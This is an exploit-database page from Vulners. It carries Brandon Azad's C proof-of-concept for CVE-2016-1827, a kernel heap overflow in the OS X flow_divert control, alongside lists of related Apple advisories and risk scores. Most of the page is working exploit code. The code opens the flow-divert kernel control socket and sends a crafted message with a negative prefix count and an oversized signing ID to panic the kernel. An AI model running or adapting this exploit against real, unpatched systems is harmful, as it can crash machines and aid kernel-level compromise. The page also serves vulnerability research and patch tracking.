Vulners
Lucene search
Apple OS X Yosemite - flow_divert-heap-overflow Kernel Panic Exploit
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | macOS < 10.11.5 Multiple Vulnerabilities | 23 Aug 201600:00 | – | nessus |
| Apple iOS < 9.3.2 Multiple Vulnerabilities | 26 May 201600:00 | – | nessus |
| Apple TV < 9.2.1 Multiple Vulnerabilities | 27 May 201600:00 | – | nessus |
| Mac OS X 10.11.x < 10.11.5 Multiple Vulnerabilities | 13 Jul 201600:00 | – | nessus |
| Apple TV < 9.2.1 Multiple Vulnerabilities | 24 May 201600:00 | – | nessus |
| Apple iOS < 9.3.2 Multiple Vulnerabilities | 18 May 201600:00 | – | nessus |
| Mac OS X 10.11.x < 10.11.5 Multiple Vulnerabilities | 19 May 201600:00 | – | nessus |
 | About the security content of OS X El Capitan v10.11.5 and Security Update 2016-003 | 16 May 201600:00 | – | apple |
| About the security content of iOS 9.3.2 | 16 May 201600:00 | – | apple |
| About the security content of watchOS 2.2.1 | 16 May 201600:00 | – | apple |
10
/*
* flow_divert-heap-overflow.c
* Brandon Azad
*
* CVE-2016-1827: Kernel heap overflow in the function flow_divert_handle_app_map_create on OS X
* and iOS. Exploitation requires root privileges. The vulnerability was patched in OS X El Capitan
* 10.11.5 and iOS 9.3.2.
*
* This proof-of-concept triggers a kernel panic on OS X Yosemite. In El Capitan the length fields
* were changed from 64 bits to 32 bits, so the message structure will need to be updated
* accordingly. This exploit has not been tested on iOS.
*
* Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44238.zip
*/
#include <net/if.h>
#include <string.h>
#include <sys/sys_domain.h>
#include <sys/kern_control.h>
#include <sys/ioctl.h>
#include <unistd.h>
int main() {
int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
if (ctlfd == -1) {
return 1;
}
struct ctl_info info = { .ctl_id = 0 };
strncpy(info.ctl_name, "com.apple.flow-divert", sizeof(info.ctl_name));
int err = ioctl(ctlfd, CTLIOCGINFO, &info);
if (err) {
return 2;
}
struct sockaddr_ctl addr = {
.sc_len = sizeof(addr),
.sc_family = AF_SYSTEM,
.ss_sysaddr = AF_SYS_CONTROL,
};
addr.sc_id = info.ctl_id;
addr.sc_unit = 0;
err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
if (err) {
return 3;
}
struct __attribute__((packed)) {
uint8_t type;
uint8_t pad1[3];
uint32_t conn_id;
uint8_t prefix_count_tag;
uint64_t prefix_count_length;
int prefix_count;
uint8_t signing_id_tag;
uint64_t signing_id_length;
uint8_t signing_id[512 + 4];
} message = {
.type = 9,
.conn_id = htonl(0),
.prefix_count_tag = 28,
.prefix_count_length = htonl(sizeof(int)),
.prefix_count = -2,
.signing_id_tag = 25,
.signing_id_length = htonl(sizeof(message.signing_id)),
.signing_id = { 0xaa },
};
write(ctlfd, &message, sizeof(message));
close(ctlfd);
return 4;
}
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2018 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.0491